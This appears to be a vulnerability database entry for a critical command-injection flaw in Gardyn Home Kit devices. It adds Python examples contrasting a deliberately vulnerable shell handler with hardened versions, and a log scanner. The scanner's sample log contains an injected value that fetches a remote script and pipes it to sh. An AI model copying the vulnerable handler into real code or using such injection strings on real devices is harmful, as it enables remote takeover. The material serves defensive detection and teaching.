CVE-2025-29631
Published 2025-07-25
Priority: P2 · 73 · critical · 9.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 1.81% (75.9th percentile)
Gardyn Home Kit firmware before master.619, Home Kit Mobile Application before 2.11.0, and Home Kit Cloud API before 2.12.2026 allow command injection through vulnerable methods that do not sanitize input before passing content to the operating system for execution. The vulnerability may allow an attacker to execute arbitrary operating system commands on a target Home Kit.
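The advisory text describes the CWE-78 pattern in general terms (input reaches an OS execution method without sanitization) and does not publish the affected methods. The following is an added illustration, not Gardyn's code: a hypothetical device-side diagnostic handler written three ways. `run_diagnostic_vulnerable` interpolates the caller-supplied host into a shell string, `run_diagnostic_quoted` escapes it for the shell, and `run_diagnostic_hardened` allowlist-validates it and passes an argv list with no shell at all. `echo` stands in for the real command (such as `ping`) so the example is safe to run.

```python
import re
import shlex
import subprocess

# Hypothetical handler names; the real Gardyn methods are not public on this page.


def run_diagnostic_vulnerable(host: str) -> str:
    """CWE-78: untrusted input interpolated into a shell command line.

    With shell=True, /bin/sh parses the string, so ';', '|', '&&', '$(...)'
    and backticks in `host` become extra commands chosen by the caller.
    """
    cmd = f"echo pinging {host}"  # stands in for e.g. f"ping -c 1 {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_diagnostic_quoted(host: str) -> str:
    """Still shell-based, but the argument is shell-quoted.

    shlex.quote wraps the value in single quotes, so metacharacters are passed
    literally. This is the fallback when a shell is unavoidable; it does not
    help if the input is later handed to a second interpreter.
    """
    cmd = f"echo pinging {shlex.quote(host)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist for the grammar a hostname is expected to have (DNS labels only).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def run_diagnostic_hardened(host: str) -> str:
    """Preferred fix: validate against an allowlist, then exec without a shell.

    The argv list goes straight to execve(); there is no shell to interpret
    metacharacters, and the regex rejects anything that is not a hostname
    before it gets that far.
    """
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host argument: {host!r}")
    argv = ["echo", "pinging", host]  # stands in for ["ping", "-c", "1", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "a; echo INJECTED"  # constructed injection string
    print("vulnerable:", repr(run_diagnostic_vulnerable(payload)))
    print("quoted:    ", repr(run_diagnostic_quoted(payload)))
    try:
        run_diagnostic_hardened(payload)
    except ValueError as exc:
        print("hardened:  ", exc)
```

Running the block shows the injected `echo INJECTED` executing as a second command in the vulnerable variant, being printed as literal text in the quoted variant, and being rejected before any process is spawned in the hardened one. The allowlist-plus-argv form is what to look for when auditing a firmware or API code base for this class of bug; a grep for `shell=True`, `system(`, `popen(` or `exec` on user-controlled strings is the usual starting point.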
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gardyn | home_kit_firmware | < master.619 | master.619 |
Detection & IOCs (extracted from sources)
- Detect OS command injection attempts targeting Gardyn Home Kit: monitor for unsanitized input being passed to OS execution methods via the Cloud API or firmware interfaces.
- Alert on unauthenticated network requests (no credentials required, CVSS PR:N) to Gardyn Home Kit Cloud API endpoints that carry shell metacharacters or command injection payloads.
- Flag Gardyn Home Kit devices running firmware versions earlier than master.619 as unpatched and at risk of command injection exploitation.
- Monitor for arbitrary OS command execution on Gardyn Home Kit edge devices, which may indicate successful exploitation of CVE-2025-29631.
- Correlate CVE-2025-29631 exploitation attempts with CVE-2025-29629 (weak default SSH credentials) and CVE-2025-1242 (hard-coded credentials): chained exploitation could allow full device takeover and lateral movement to other edge devices in the Gardyn cloud environment.
- CVE-2025-29631 affects three distinct attack surfaces: the firmware (before master.619), the mobile application (before 2.11.0), and the Cloud API (before 2.12.2026). Detection coverage must account for all three vectors.
- As of the advisory date, Gardyn had not yet released a full mitigation for CVE-2025-29631. Firmware upgrade to master.619 is recommended but may not fully remediate the vulnerability.
- The vulnerability is unauthenticated (CVSS PR:N), meaning no prior credential compromise is required for exploitation. Network-level access controls are the primary compensating control until a full patch is available.
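Two of the detection items above are mechanical enough to script: scanning Cloud API request logs for shell metacharacters in parameters, and flagging firmware builds below master.619. The block below is an added example, not a Gardyn or CISA artifact. The log lines are constructed, and the endpoint paths and parameter names are hypothetical; only the version scheme (`master.<build>`) and the fixed build come from this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access log for a hypothetical Cloud API.
# Paths, parameters and the 198.51.100.7 address are illustrative only.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jul/2025:10:00:01 +0000] "POST /api/v1/device/ping?host=garden.local HTTP/1.1" 200 51
10.0.0.9 - - [25/Jul/2025:10:00:02 +0000] "POST /api/v1/device/ping?host=x%3Bcurl%20198.51.100.7%2Fa%7Csh HTTP/1.1" 200 51
10.0.0.9 - - [25/Jul/2025:10:00:03 +0000] "GET /api/v1/device/status?id=%24%28id%29 HTTP/1.1" 200 88
10.0.0.7 - - [25/Jul/2025:10:00:04 +0000] "GET /api/v1/device/status?id=kit-0042 HTTP/1.1" 200 88
"""

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Shell metacharacters and constructs that have no place in a hostname or
# device identifier: command separators, pipes, redirection, substitution.
META_RE = re.compile(r"[;&|`\n<>]|\$\(|\$\{")


def find_injection_candidates(log_text: str):
    """Return (line_number, parameter, decoded_value) for every query parameter
    containing shell metacharacters.

    parse_qsl percent-decodes values, so an encoded '%3B' is inspected as ';'
    and the check cannot be bypassed by URL encoding alone.
    """
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(match.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if META_RE.search(value):
                hits.append((lineno, name, value))
    return hits


def firmware_is_unpatched(version: str, fixed: str = "master.619") -> bool:
    """True if `version` is on the same branch as `fixed` but an older build.

    The page gives versions as '<branch>.<build>' (e.g. master.619). A version
    on a different branch cannot be ordered against the fix, so it is treated
    as an error rather than silently marked patched.
    """
    branch, _, build = version.rpartition(".")
    fixed_branch, _, fixed_build = fixed.rpartition(".")
    if not build.isdigit() or not fixed_build.isdigit():
        raise ValueError(f"unrecognised version string: {version!r}")
    if branch != fixed_branch:
        raise ValueError(f"cannot compare branch {branch!r} with {fixed_branch!r}")
    return int(build) < int(fixed_build)


if __name__ == "__main__":
    for lineno, name, value in find_injection_candidates(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r} contains {value!r}")
    for v in ("master.618", "master.619", "master.700"):
        print(v, "unpatched" if firmware_is_unpatched(v) else "patched")
```

The scanner only sees query strings; parameters sent in POST bodies need the same check applied where the body is visible (a reverse proxy or WAF with body logging), which is worth confirming before relying on this as coverage for the Cloud API vector. The metacharacter list is deliberately broad for a field that should only ever hold a hostname or identifier; for free-text fields it would need tightening to avoid noise.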
GHSA
GHSA-4993-4c8h-h8w5 (unreviewed, 2025-07-25) · CVE-2025-29631 · CRITICAL · CWE-78
An issue in Gardyn 4 allows a remote attacker to execute arbitrary code.
CISA ICS
ICSA-26-055-03: Gardyn Home Kit (ICS Advisory, CRITICAL, CVSS 9.1)
Release Date: February 24, 2026
Alert Code: ICSA-26-055-03
Related topics: Industrial Control System Vulnerabilities, Industrial Control Systems
## Summary
Successful exploitation of these vulnerabilities could allow unauthenticated users to access and control edge devices, access cloud-based devices and user information without authentication, and pivot to other edge devices managed in the Gardyn cloud environment.
The following versions of Gardyn Home Kit are affected:
- Home Kit Firmware
- Gardyn Home Kit Mobile Application <2.11.0 (CVE-2025-29628, CVE-2025-29629, CVE-2025-29631, CVE-2025-1242)
- Gardyn Home Kit Cloud API <2.12.2026 (CVE-2025-29628, CVE-2025-29629, CVE-2025-29631, CVE-2025-1242)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.